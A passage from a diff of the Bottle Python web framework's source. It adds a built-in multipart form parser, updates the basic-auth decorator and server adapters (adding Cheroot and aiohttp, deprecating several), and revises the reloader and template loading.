scriptlist = [] - if shift > 0 and shift <= len(pathlist): + if 0 < shift <= len(pathlist): moved = pathlist[:shift] scriptlist = scriptlist + moved pathlist = pathlist[shift:] - elif shift < 0 and shift >= -len(scriptlist): + elif 0 > shift >= -len(scriptlist): moved = scriptlist[shift:] pathlist = moved + pathlist scriptlist = scriptlist[:shift] @@ -2279,56 +3162,45 @@ def path_shift(script_name, path_info, shift=1): return new_script_name, new_path_info -def validate(**vkargs): - """ - Validates and manipulates keyword arguments by user defined callables. - Handles ValueError and missing arguments by raising HTTPError(403). - """ - depr('Use route wildcard filters instead.') +def auth_basic(check, realm="private", text="Access denied"): + """ Callback decorator to require HTTP auth (basic). + TODO: Add route(check_auth=...) parameter. 
""" + def decorator(func): + @functools.wraps(func) - def wrapper(*args, **kargs): - for key, value in vkargs.items(): - if key not in kargs: - abort(403, 'Missing parameter: %s' % key) - try: - kargs[key] = value(kargs[key]) - except ValueError: - abort(403, 'Wrong parameter format for: %s' % key) - return func(*args, **kargs) - return wrapper - return decorator + def wrapper(*a, **ka): + user, password = request.auth or (None, None) + if user is None or not check(user, password): + err = HTTPError(401, text) + err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm) + return err + return func(*a, **ka) + return wrapper -def auth_basic(check, realm="private", text="Access denied"): - ''' Callback decorator to require HTTP auth (basic). - TODO: Add route(check_auth=...) parameter. ''' - def decorator(func): - def wrapper(*a, **ka): - user, password = request.auth or (None, None) - if user is None or not check(user, password): - response.headers['WWW-Authenticate'] = 'Basic realm="%s"' % realm - return HTTPError(401, text) - return func(*a, **ka) - return wrapper return decorator - # Shortcuts for common Bottle methods. # They all refer to the current default application. + def make_default_app_wrapper(name): - ''' Return a callable that relays calls to the current default app. ''' + """ Return a callable that relays calls to the current default app. """ + @functools.wraps(getattr(Bottle, name)) def wrapper(*a, **ka): return getattr(app(), name)(*a, **ka) + return wrapper + route = make_default_app_wrapper('route') get = make_default_app_wrapper('get') post = make_default_app_wrapper('post') put = make_default_app_wrapper('put') delete = make_default_app_wrapper('delete') +patch = make_default_app_wrapper('patch') error = make_default_app_wrapper('error') mount = make_default_app_wrapper('mount') hook = make_default_app_wrapper('hook') @@ -2337,63 +3209,374 @@ def wrapper(*a, **ka): url = make_default_app_wrapper('get_url') +############################################################################### +# Multipart Handling ########################################################### +############################################################################### +# cgi.FieldStorage was deprecated in Python 3.11 and removed in 3.13 +# This implementation is based on https://github.com/defnull/multipart/ + + +class MultipartError(HTTPError): + def __init__(self, msg): + HTTPError.__init__(self, 400, "MultipartError: " + msg) + + +class _MultipartParser(object): + def __init__( + self, + stream, + boundary, + content_length=-1, + disk_limit=2 ** 30, + mem_limit=2 ** 20, + memfile_limit=2 ** 18, + buffer_size=2 ** 16, + charset="latin1", + ): + self.stream = stream + self.boundary = boundary + self.content_length = content_length + self.disk_limit = disk_limit + self.memfile_limit = memfile_limit + self.mem_limit = min(mem_limit, self.disk_limit) + self.buffer_size = min(buffer_size, self.mem_limit) + self.charset = charset + + if not boundary: + raise MultipartError("No boundary.") + + if self.buffer_size - 6 < len(boundary): # "--boundary--\r\n" + raise MultipartError("Boundary does not fit into buffer_size.") + + def _lineiter(self): + """ Iterate over a binary file-like object (crlf terminated) line by + line. Each line is returned as a (line, crlf) tuple. Lines larger + than buffer_size are split into chunks where all but the last chunk + has an empty string instead of crlf. Maximum chunk size is twice the + buffer size. 
+ """ + + read = self.stream.read + maxread, maxbuf = self.content_length, self.buffer_size + partial = b"" # Contains the last (partial) line + + while True: + chunk = read(maxbuf if maxread < 0 else min(maxbuf, maxread)) + maxread -= len(chunk) + if not chunk: + if partial: + yield partial, b'' + break + + if partial: + chunk = partial + chunk + + scanpos = 0 + while True: + i = chunk.find(b'\r\n', scanpos) + if i >= 0: + yield chunk[scanpos:i], b'\r\n' + scanpos = i + 2 + else: # CRLF not found + partial = chunk[scanpos:] if scanpos else chunk + break + + if len(partial) > maxbuf: + yield partial[:-1], b"" + partial = partial[-1:] + + def parse(self): + """ Return a MultiPart iterator. Can only be called once. """ + + lines, line = self._lineiter(), "" + separator = b"--" + tob(self.boundary) + terminator = separator + b"--" + mem_used, disk_used = 0, 0 # Track used resources to prevent DoS + is_tail = False # True if the last line was incomplete (cutted) + + # Consume first boundary. Ignore any preamble, as required by RFC + # 2046, section 5.1.1. + for line, nl in lines: + if line in (separator, terminator): + break + else: + raise MultipartError("Stream does not contain boundary") + + # First line is termainating boundary -> empty multipart stream + if line == terminator: + for _ in lines: + raise MultipartError("Found data after empty multipart stream") + return + + part_options = { + "buffer_size": self.buffer_size, + "memfile_limit": self.memfile_limit, + "charset": self.charset, + } + part = _MultipartPart(**part_options) + + for line, nl in lines: + if not is_tail and (line == separator or line == terminator): + part.finish() + if part.is_buffered(): + mem_used += part.size + else: + disk_used += part.size + yield part + if line == terminator: + break + part = _MultipartPart(**part_options) + else: + is_tail = not nl # The next line continues this one + try: + part.feed(line, nl) + if part.is_buffered(): + if part.size + mem_used > self.mem_limit: + raise MultipartError("Memory limit reached.") + elif part.size + disk_used > self.disk_limit: + raise MultipartError("Disk limit reached.") + except MultipartError: + part.close() + raise + else: + part.close() + + if line != terminator: + raise MultipartError("Unexpected end of multipart stream.") + + +class _MultipartPart(object): + def __init__(self, buffer_size=2 ** 16, memfile_limit=2 ** 18, charset="latin1"): + self.headerlist = [] + self.headers = None + self.file = False + self.size = 0 + self._buf = b"" + self.disposition = None + self.name = None + self.filename = None + self.content_type = None + self.charset = charset + self.memfile_limit = memfile_limit + self.buffer_size = buffer_size + + def feed(self, line, nl=""): + if self.file: + return self.write_body(line, nl) + return self.write_header(line, nl) + + def write_header(self, line, nl): + line = line.decode(self.charset) + + if not nl: + raise MultipartError("Unexpected end of line in header.") + + if not line.strip(): # blank line -> end of header segment + self.finish_header() + elif line[0] in " \t" and self.headerlist: + name, value = self.headerlist.pop() + self.headerlist.append((name, value + line.strip())) + else: + if ":" not in line: + raise MultipartError("Syntax error in header: No colon.") + + name, value = line.split(":", 1) + self.headerlist.append((name.strip(), value.strip())) + + def write_body(self, line, nl): + if not line and not nl: + return # This does not even flush the buffer + + self.size += len(line) + len(self._buf) + 
self.file.write(self._buf + line) + self._buf = nl + if self.content_length > 0 and self.size > self.content_length: + raise MultipartError("Size of body exceeds Content-Length header.") + if self.size > self.memfile_limit and isinstance(self.file, BytesIO): + self.file, old = NamedTemporaryFile(mode="w+b"), self.file + old.seek(0) + copied, maxcopy, chunksize = 0, self.size, self.buffer_size + read, write = old.read, self.file.write + while copied < maxcopy: + chunk = read(min(chunksize, maxcopy - copied)) + write(chunk) + copied += len(chunk) + def finish_header(self): + self.file = BytesIO() + self.headers = HeaderDict(self.headerlist) + content_disposition = self.headers.get("Content-Disposition") + content_type = self.headers.get("Content-Type") + + if not content_disposition: + raise MultipartError("Content-Disposition header is missing.") + + self.disposition, self.options = _parse_http_header(content_disposition)[0] + self.name = self.options.get("name") + if "filename" in self.options: + self.filename = self.options.get("filename") + if self.filename[1:3] == ":\\" or self.filename[:2] == "\\\\": + self.filename = self.filename.split("\\")[-1] # ie6 bug + + self.content_type, options = _parse_http_header(content_type)[0] if content_type else (None, {}) + self.charset = options.get("charset") or self.charset + + self.content_length = int(self.headers.get("Content-Length", "-1")) + + def finish(self): + if not self.file: + raise MultipartError("Incomplete part: Header section not closed.") + self.file.seek(0) + + def is_buffered(self): + """ Return true if the data is fully buffered in memory.""" + return isinstance(self.file, BytesIO) + + @property + def value(self): + """ Data decoded with the specified charset """ + + return self.raw.decode(self.charset) + + @property + def raw(self): + """ Data without decoding """ + pos = self.file.tell() + self.file.seek(0) + + try: + return self.file.read() + finally: + self.file.seek(pos) + + def close(self): + if self.file: + self.file.close() + self.file = False ############################################################################### # Server Adapter ############################################################### ############################################################################### +# Before you edit or add a server adapter, please read: +# - https://github.com/bottlepy/bottle/pull/647#issuecomment-60152870 +# - https://github.com/bottlepy/bottle/pull/865#issuecomment-242795341 class ServerAdapter(object): quiet = False - def __init__(self, host='127.0.0.1', port=8080, **config): - self.options = config + + def __init__(self, host='127.0.0.1', port=8080, **options): + self.options = options self.host = host self.port = int(port) - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover pass def __repr__(self): - args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()]) + args = ', '.join('%s=%s' % (k, repr(v)) + for k, v in self.options.items()) return "%s(%s)" % (self.__class__.__name__, args) class CGIServer(ServerAdapter): quiet = True - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover from wsgiref.handlers import CGIHandler + def fixed_environ(environ, start_response): environ.setdefault('PATH_INFO', '') return handler(environ, start_response) + CGIHandler().run(fixed_environ) class FlupFCGIServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover import flup.server.fcgi 
self.options.setdefault('bindAddress', (self.host, self.port)) flup.server.fcgi.WSGIServer(handler, **self.options).run() class WSGIRefServer(ServerAdapter): - def run(self, handler): # pragma: no cover - from wsgiref.simple_server import make_server, WSGIRequestHandler - if self.quiet: - class QuietHandler(WSGIRequestHandler): - def log_request(*args, **kw): pass - self.options['handler_class'] = QuietHandler - srv = make_server(self.host, self.port, handler, **self.options) - srv.serve_forever() + def run(self, app): # pragma: no cover + from wsgiref.simple_server import make_server + from wsgiref.simple_server import WSGIRequestHandler, WSGIServer + import socket + + class FixedHandler(WSGIRequestHandler): + def address_string(self): # Prevent reverse DNS lookups please. + return self.client_address[0] + + def log_request(*args, **kw): + if not self.quiet: + return WSGIRequestHandler.log_request(*args, **kw) + + handler_cls = self.options.get('handler_class', FixedHandler) + server_cls = self.options.get('server_class', WSGIServer) + + if ':' in self.host: # Fix wsgiref for IPv6 addresses. + if getattr(server_cls, 'address_family') == socket.AF_INET: + + class server_cls(server_cls): + address_family = socket.AF_INET6 + + self.srv = make_server(self.host, self.port, app, server_cls, + handler_cls) + self.port = self.srv.server_port # update port actual port (0 means random) + try: + self.srv.serve_forever() + except KeyboardInterrupt: + self.srv.server_close() # Prevent ResourceWarning: unclosed socket + raise class CherryPyServer(ServerAdapter): + def run(self, handler): # pragma: no cover + depr(0, 13, "The wsgi server part of cherrypy was split into a new " + "project called 'cheroot'.", "Use the 'cheroot' server " + "adapter instead of cherrypy.") + from cherrypy import wsgiserver # This will fail for CherryPy >= 9 + + self.options['bind_addr'] = (self.host, self.port) + self.options['wsgi_app'] = handler + + certfile = self.options.get('certfile') + if certfile: + del self.options['certfile'] + keyfile = self.options.get('keyfile') + if keyfile: + del self.options['keyfile'] + + server = wsgiserver.CherryPyWSGIServer(**self.options) + if certfile: + server.ssl_certificate = certfile + if keyfile: + server.ssl_private_key = keyfile + + try: + server.start() + finally: + server.stop() + + +class CherootServer(ServerAdapter): def run(self, handler): # pragma: no cover - from cherrypy import wsgiserver - server = wsgiserver.CherryPyWSGIServer((self.host, self.port), handler) + from cheroot import wsgi + from cheroot.ssl import builtin + self.options['bind_addr'] = (self.host, self.port) + self.options['wsgi_app'] = handler + certfile = self.options.pop('certfile', None) + keyfile = self.options.pop('keyfile', None) + chainfile = self.options.pop('chainfile', None) + server = wsgi.Server(**self.options) + if certfile and keyfile: + server.ssl_adapter = builtin.BuiltinSSLAdapter( + certfile, keyfile, chainfile) try: server.start() finally: @@ -2403,17 +3586,17 @@ def run(self, handler): # pragma: no cover class WaitressServer(ServerAdapter): def run(self, handler): from waitress import serve - serve(handler, host=self.host, port=self.port) + serve(handler, host=self.host, port=self.port, _quiet=self.quiet, **self.options) class PasteServer(ServerAdapter): - def run(self, handler): # pragma: no cover + def run(self, handler): # pragma: no cover from paste import httpserver - if not self.quiet: - from paste.translogger import TransLogger - handler = TransLogger(handler) - 
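# --- Editor's sketch (not part of the patch) ---------------------------------
# Hedged usage example for the CherootServer adapter above: 'certfile' and
# 'keyfile' (plus an optional 'chainfile') are popped from the adapter options
# to enable TLS. The application, paths and port are illustrative placeholders.
import bottle

app = bottle.Bottle()

@app.route('/')
def index():
    return 'hello over TLS'

if __name__ == '__main__':
    bottle.run(app, server='cheroot', host='0.0.0.0', port=8443,
               certfile='cert.pem', keyfile='key.pem')
# ------------------------------------------------------------------------------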
httpserver.serve(handler, host=self.host, port=str(self.port), - **self.options) + from paste.translogger import TransLogger + handler = TransLogger(handler, setup_console_handler=(not self.quiet)) + httpserver.serve(handler, + host=self.host, + port=str(self.port), **self.options) class MeinheldServer(ServerAdapter): @@ -2424,8 +3607,10 @@ def run(self, handler): class FapwsServer(ServerAdapter): - """ Extremely fast webserver using libev. See http://www.fapws.org/ """ - def run(self, handler): # pragma: no cover + """ Extremely fast webserver using libev. See https://github.com/william-os4y/fapws3 """ + + def run(self, handler): # pragma: no cover + depr(0, 13, "fapws3 is not maintained and support will be dropped.") import fapws._evwsgi as evwsgi from fapws import base, config port = self.port @@ -2435,30 +3620,36 @@ def run(self, handler): # pragma: no cover evwsgi.start(self.host, port) # fapws3 never releases the GIL. Complain upstream. I tried. No luck. if 'BOTTLE_CHILD' in os.environ and not self.quiet: - _stderr("WARNING: Auto-reloading does not work with Fapws3.\n") - _stderr(" (Fapws3 breaks python thread support)\n") + _stderr("WARNING: Auto-reloading does not work with Fapws3.") + _stderr(" (Fapws3 breaks python thread support)") evwsgi.set_base_module(base) + def app(environ, start_response): environ['wsgi.multiprocess'] = False return handler(environ, start_response) + evwsgi.wsgi_cb(('', app)) evwsgi.run() class TornadoServer(ServerAdapter): """ The super hyped asynchronous server by facebook. Untested. """ - def run(self, handler): # pragma: no cover + + def run(self, handler): # pragma: no cover import tornado.wsgi, tornado.httpserver, tornado.ioloop container = tornado.wsgi.WSGIContainer(handler) server = tornado.httpserver.HTTPServer(container) - server.listen(port=self.port) + server.listen(port=self.port, address=self.host) tornado.ioloop.IOLoop.instance().start() class AppEngineServer(ServerAdapter): """ Adapter for Google App Engine. """ quiet = True + def run(self, handler): + depr(0, 13, "AppEngineServer no longer required", + "Configure your application directly in your app.yaml") from google.appengine.ext.webapp import util # A main() function in the handler script enables 'App Caching'. # Lets makes sure it is there. This _really_ improves performance. @@ -2470,6 +3661,7 @@ def run(self, handler): class TwistedServer(ServerAdapter): """ Untested. """ + def run(self, handler): from twisted.web import server, wsgi from twisted.python.threadpool import ThreadPool @@ -2479,12 +3671,15 @@ def run(self, handler): reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop) factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler)) reactor.listenTCP(self.port, factory, interface=self.host) - reactor.run() + if not reactor.running: + reactor.run() class DieselServer(ServerAdapter): """ Untested. """ + def run(self, handler): + depr(0, 13, "Diesel is not tested or supported and will be removed.") from diesel.protocols.wsgi import WSGIApplication app = WSGIApplication(handler, port=self.port) app.run() @@ -2493,30 +3688,41 @@ def run(self, handler): class GeventServer(ServerAdapter): """ Untested. Options: - * `fast` (default: False) uses libevent's http server, but has some - issues: No streaming, no pipelining, no SSL. + * See gevent.wsgi.WSGIServer() documentation for more options. 
""" + def run(self, handler): - from gevent import wsgi, pywsgi, local - if not isinstance(_lctx, local.local): + from gevent import pywsgi, local + if not isinstance(threading.local(), local.local): msg = "Bottle requires gevent.monkey.patch_all() (before import)" raise RuntimeError(msg) - if not self.options.get('fast'): wsgi = pywsgi - log = None if self.quiet else 'default' - wsgi.WSGIServer((self.host, self.port), handler, log=log).serve_forever() + if self.quiet: + self.options['log'] = None + address = (self.host, self.port) + server = pywsgi.WSGIServer(address, handler, **self.options) + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: server.stop()) + server.serve_forever() class GunicornServer(ServerAdapter): """ Untested. See http://gunicorn.org/configure.html for options. """ + def run(self, handler): - from gunicorn.app.base import Application + from gunicorn.app.base import BaseApplication + + if self.host.startswith("unix:"): + config = {'bind': self.host} + else: + config = {'bind': "%s:%d" % (self.host, self.port)} - config = {'bind': "%s:%d" % (self.host, int(self.port))} config.update(self.options) - class GunicornApplication(Application): - def init(self, parser, opts, args): - return config + class GunicornApplication(BaseApplication): + def load_config(self): + for key, value in config.items(): + self.cfg.set(key, value) def load(self): return handler @@ -2525,35 +3731,83 @@ def load(self): class EventletServer(ServerAdapter): - """ Untested """ + """ Untested. Options: + + * `backlog` adjust the eventlet backlog parameter which is the maximum + number of queued connections. Should be at least 1; the maximum + value is system-dependent. + * `family`: (default is 2) socket family, optional. See socket + documentation for available families. + """ + def run(self, handler): - from eventlet import wsgi, listen + from eventlet import wsgi, listen, patcher + if not patcher.is_monkey_patched(os): + msg = "Bottle requires eventlet.monkey_patch() (before import)" + raise RuntimeError(msg) + socket_args = {} + for arg in ('backlog', 'family'): + try: + socket_args[arg] = self.options.pop(arg) + except KeyError: + pass + address = (self.host, self.port) try: - wsgi.server(listen((self.host, self.port)), handler, + wsgi.server(listen(address, **socket_args), handler, log_output=(not self.quiet)) except TypeError: # Fallback, if we have old version of eventlet - wsgi.server(listen((self.host, self.port)), handler) - - -class RocketServer(ServerAdapter): - """ Untested. 
""" - def run(self, handler): - from rocket import Rocket - server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler }) - server.start() + wsgi.server(listen(address), handler) class BjoernServer(ServerAdapter): """ Fast server written in C: https://github.com/jonashaag/bjoern """ + def run(self, handler): from bjoern import run - run(handler, self.host, self.port) + run(handler, self.host, self.port, reuse_port=True) + +class AsyncioServerAdapter(ServerAdapter): + """ Extend ServerAdapter for adding custom event loop """ + def get_event_loop(self): + pass + +class AiohttpServer(AsyncioServerAdapter): + """ Asynchronous HTTP client/server framework for asyncio + https://pypi.python.org/pypi/aiohttp/ + https://pypi.org/project/aiohttp-wsgi/ + """ + + def get_event_loop(self): + import asyncio + return asyncio.new_event_loop() + + def run(self, handler): + import asyncio + from aiohttp_wsgi.wsgi import serve + self.loop = self.get_event_loop() + asyncio.set_event_loop(self.loop) + + if 'BOTTLE_CHILD' in os.environ: + import signal + signal.signal(signal.SIGINT, lambda s, f: self.loop.stop()) + + serve(handler, host=self.host, port=self.port) + +class AiohttpUVLoopServer(AiohttpServer): + """uvloop + https://github.com/MagicStack/uvloop + """ + def get_event_loop(self): + import uvloop + return uvloop.new_event_loop() class AutoServer(ServerAdapter): """ Untested. """ - adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer] + adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, + CherootServer, WSGIRefServer] + def run(self, handler): for sa in self.adapters: try: @@ -2561,12 +3815,14 @@ def run(self, handler): except ImportError: pass + server_names = { 'cgi': CGIServer, 'flup': FlupFCGIServer, 'wsgiref': WSGIRefServer, 'waitress': WaitressServer, 'cherrypy': CherryPyServer, + 'cheroot': CherootServer, 'paste': PasteServer, 'fapws3': FapwsServer, 'tornado': TornadoServer, @@ -2577,16 +3833,12 @@ def run(self, handler): 'gunicorn': GunicornServer, 'eventlet': EventletServer, 'gevent': GeventServer, - 'rocket': RocketServer, - 'bjoern' : BjoernServer, + 'bjoern': BjoernServer, + 'aiohttp': AiohttpServer, + 'uvloop': AiohttpUVLoopServer, 'auto': AutoServer, } - - - - - ############################################################################### # Application Control ########################################################## ############################################################################### @@ -2616,19 +3868,30 @@ def load_app(target): """ Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter. 
""" - global NORUN; NORUN, nr_old = True, NORUN + global NORUN + NORUN, nr_old = True, NORUN + tmp = default_app.push() # Create a new "default application" try: - tmp = default_app.push() # Create a new "default application" - rv = load(target) # Import the target module + rv = load(target) # Import the target module return rv if callable(rv) else tmp finally: - default_app.remove(tmp) # Remove the temporary added default application + default_app.remove(tmp) # Remove the temporary added default application NORUN = nr_old + _debug = debug -def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, - interval=1, reloader=False, quiet=False, plugins=None, - debug=False, **kargs): + + +def run(app=None, + server='wsgiref', + host='127.0.0.1', + port=8080, + interval=1, + reloader=False, + quiet=False, + plugins=None, + debug=None, + config=None, **kargs): """ Start a server instance. This method blocks until the server terminates. :param app: WSGI application or target string supported by @@ -2647,22 +3910,27 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, """ if NORUN: return if reloader and not os.environ.get('BOTTLE_CHILD'): + import subprocess + fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') + environ = os.environ.copy() + environ['BOTTLE_CHILD'] = 'true' + environ['BOTTLE_LOCKFILE'] = lockfile + args = [sys.executable] + sys.argv + # If a package was loaded with `python -m`, then `sys.argv` needs to be + # restored to the original value, or imports might break. See #1336 + if getattr(sys.modules.get('__main__'), '__package__', None): + args[1:1] = ["-m", sys.modules['__main__'].__package__] + try: - lockfile = None - fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') - os.close(fd) # We only need this file to exist. We never write to it + os.close(fd) # We never write to this file while os.path.exists(lockfile): - args = [sys.executable] + sys.argv - environ = os.environ.copy() - environ['BOTTLE_CHILD'] = 'true' - environ['BOTTLE_LOCKFILE'] = lockfile p = subprocess.Popen(args, env=environ) - while p.poll() is None: # Busy wait... - os.utime(lockfile, None) # I am alive! + while p.poll() is None: + os.utime(lockfile, None) # Tell child we are still alive time.sleep(interval) - if p.poll() != 3: - if os.path.exists(lockfile): os.unlink(lockfile) - sys.exit(p.poll()) + if p.returncode == 3: # Child wants to be restarted + continue + sys.exit(p.returncode) except KeyboardInterrupt: pass finally: @@ -2671,7 +3939,7 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, return try: - _debug(debug) + if debug is not None: _debug(debug) app = app or default_app() if isinstance(app, basestring): app = load_app(app) @@ -2679,8 +3947,13 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, raise ValueError("Application is not callable: %r" % app) for plugin in plugins or []: + if isinstance(plugin, basestring): + plugin = load(plugin) app.install(plugin) + if config: + app.config.update(config) + if server in server_names: server = server_names.get(server) if isinstance(server, basestring): @@ -2692,9 +3965,14 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, server.quiet = server.quiet or quiet if not server.quiet: - _stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server))) - _stderr("Listening on http://%s:%d/\n" % (server.host, server.port)) - _stderr("Hit Ctrl-C to quit.\n\n") + _stderr("Bottle v%s server starting up (using %s)..." 
% + (__version__, repr(server))) + if server.host.startswith("unix:"): + _stderr("Listening on %s" % server.host) + else: + _stderr("Listening on http://%s:%d/" % + (server.host, server.port)) + _stderr("Hit Ctrl-C to quit.\n") if reloader: lockfile = os.environ.get('BOTTLE_LOCKFILE') @@ -2717,24 +3995,24 @@ def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, sys.exit(3) - class FileCheckerThread(threading.Thread): - ''' Interrupt main-thread as soon as a changed module file is detected, - the lockfile gets deleted or gets to old. ''' + """ Interrupt main-thread as soon as a changed module file is detected, + the lockfile gets deleted or gets too old. """ def __init__(self, lockfile, interval): threading.Thread.__init__(self) + self.daemon = True self.lockfile, self.interval = lockfile, interval #: Is one of 'reload', 'error' or 'exit' self.status = None def run(self): exists = os.path.exists - mtime = lambda path: os.stat(path).st_mtime + mtime = lambda p: os.stat(p).st_mtime files = dict() for module in list(sys.modules.values()): - path = getattr(module, '__file__', '') + path = getattr(module, '__file__', '') or '' if path[-4:] in ('.pyo', '.pyc'): path = path[:-1] if path and exists(path): files[path] = mtime(path) @@ -2753,32 +4031,31 @@ def run(self): def __enter__(self): self.start() - def __exit__(self, exc_type, exc_val, exc_tb): - if not self.status: self.status = 'exit' # silent exit + def __exit__(self, exc_type, *_): + if not self.status: self.status = 'exit' # silent exit self.join() return exc_type is not None and issubclass(exc_type, KeyboardInterrupt) - - - - ############################################################################### # Template Adapters ############################################################ ############################################################################### -class TemplateError(HTTPError): - def __init__(self, message): - HTTPError.__init__(self, 500, message) +class TemplateError(BottleException): + pass class BaseTemplate(object): """ Base class and minimal API for template adapters """ - extensions = ['tpl','html','thtml','stpl'] - settings = {} #used in prepare() - defaults = {} #used in render() - - def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings): + extensions = ['tpl', 'html', 'thtml', 'stpl'] + settings = {} #used in prepare() + defaults = {} #used in render() + + def __init__(self, + source=None, + name=None, + lookup=None, + encoding='utf8', **settings): """ Create a new template. If the source parameter (str or buffer) is missing, the name argument is used to guess a template filename. 
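# --- Editor's sketch (not part of the patch) ---------------------------------
# Standalone illustration (helper names are mine) of the mtime bookkeeping
# FileCheckerThread performs above: snapshot the file behind every loaded
# module, then report any file that changed or disappeared since the snapshot.
import os
import sys

def snapshot_module_mtimes():
    files = {}
    for module in list(sys.modules.values()):
        path = getattr(module, '__file__', '') or ''
        if path[-4:] in ('.pyo', '.pyc'):
            path = path[:-1]
        if path and os.path.exists(path):
            files[path] = os.stat(path).st_mtime
    return files

def changed_files(snapshot):
    return [path for path, mtime in snapshot.items()
            if not os.path.exists(path) or os.stat(path).st_mtime > mtime]
# ------------------------------------------------------------------------------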
Subclasses can assume that @@ -2792,10 +4069,10 @@ def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **setting self.name = name self.source = source.read() if hasattr(source, 'read') else source self.filename = source.filename if hasattr(source, 'filename') else None - self.lookup = [os.path.abspath(x) for x in lookup] + self.lookup = [os.path.abspath(x) for x in lookup] if lookup else [] self.encoding = encoding - self.settings = self.settings.copy() # Copy from class variable - self.settings.update(settings) # Apply + self.settings = self.settings.copy() # Copy from class variable + self.settings.update(settings) # Apply if not self.source and self.name: self.filename = self.search(self.name, self.lookup) if not self.filename: @@ -2805,16 +4082,15 @@ def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **setting self.prepare(**self.settings) @classmethod - def search(cls, name, lookup=[]): + def search(cls, name, lookup=None): """ Search name in all directories specified in lookup. First without, then with common extensions. Return first hit. """ if not lookup: - depr('The template lookup path list should not be empty.') - lookup = ['.'] + raise depr(0, 12, "Empty template lookup path.", "Configure a template lookup path.") - if os.path.isabs(name) and os.path.isfile(name): - depr('Absolute template path names are deprecated.') - return os.path.abspath(name) + if os.path.isabs(name): + raise depr(0, 12, "Use of absolute path for template name.", + "Refer to templates with names or paths relative to the lookup path.") for spath in lookup: spath = os.path.abspath(spath) + os.sep @@ -2827,9 +4103,9 @@ def search(cls, name, lookup=[]): @classmethod def global_config(cls, key, *args): - ''' This reads or sets the global settings stored in class.settings. ''' + """ This reads or sets the global settings stored in class.settings. """ if args: - cls.settings = cls.settings.copy() # Make settings local to class + cls.settings = cls.settings.copy() # Make settings local to class cls.settings[key] = args[0] else: return cls.settings[key] @@ -2845,8 +4121,8 @@ def render(self, *args, **kwargs): """ Render the template with the specified local variables and return a single byte or unicode string. If it is a byte string, the encoding must match self.encoding. This method must be thread-safe! - Local variables may be provided in dictionaries (*args) - or directly, as keywords (**kwargs). + Local variables may be provided in dictionaries (args) + or directly, as keywords (kwargs). 
""" raise NotImplementedError @@ -2855,16 +4131,19 @@ class MakoTemplate(BaseTemplate): def prepare(self, **options): from mako.template import Template from mako.lookup import TemplateLookup - options.update({'input_encoding':self.encoding}) + options.update({'input_encoding': self.encoding}) options.setdefault('format_exceptions', bool(DEBUG)) lookup = TemplateLookup(directories=self.lookup, **options) if self.source: self.tpl = Template(self.source, lookup=lookup, **options) else: - self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options) + self.tpl = Template(uri=self.name, + filename=self.filename, + lookup=lookup, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) @@ -2882,7 +4161,8 @@ def prepare(self, **options): self.tpl = Template(file=self.filename, **options) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) self.context.vars.update(self.defaults) self.context.vars.update(kwargs) out = str(self.tpl) @@ -2891,218 +4171,315 @@ def render(self, *args, **kwargs): class Jinja2Template(BaseTemplate): - def prepare(self, filters=None, tests=None, **kwargs): + def prepare(self, filters=None, tests=None, globals={}, **kwargs): from jinja2 import Environment, FunctionLoader - if 'prefix' in kwargs: # TODO: to be removed after a while - raise RuntimeError('The keyword argument `prefix` has been removed. ' - 'Use the full jinja2 environment name line_statement_prefix instead.') self.env = Environment(loader=FunctionLoader(self.loader), **kwargs) if filters: self.env.filters.update(filters) if tests: self.env.tests.update(tests) + if globals: self.env.globals.update(globals) if self.source: self.tpl = self.env.from_string(self.source) else: - self.tpl = self.env.get_template(self.filename) + self.tpl = self.env.get_template(self.name) def render(self, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + for dictarg in args: + kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) def loader(self, name): - fname = self.search(name, self.lookup) + if name == self.filename: + fname = name + else: + fname = self.search(name, self.lookup) if not fname: return with open(fname, "rb") as f: - return f.read().decode(self.encoding) - - -class SimpleTALTemplate(BaseTemplate): - ''' Deprecated, do not use. 
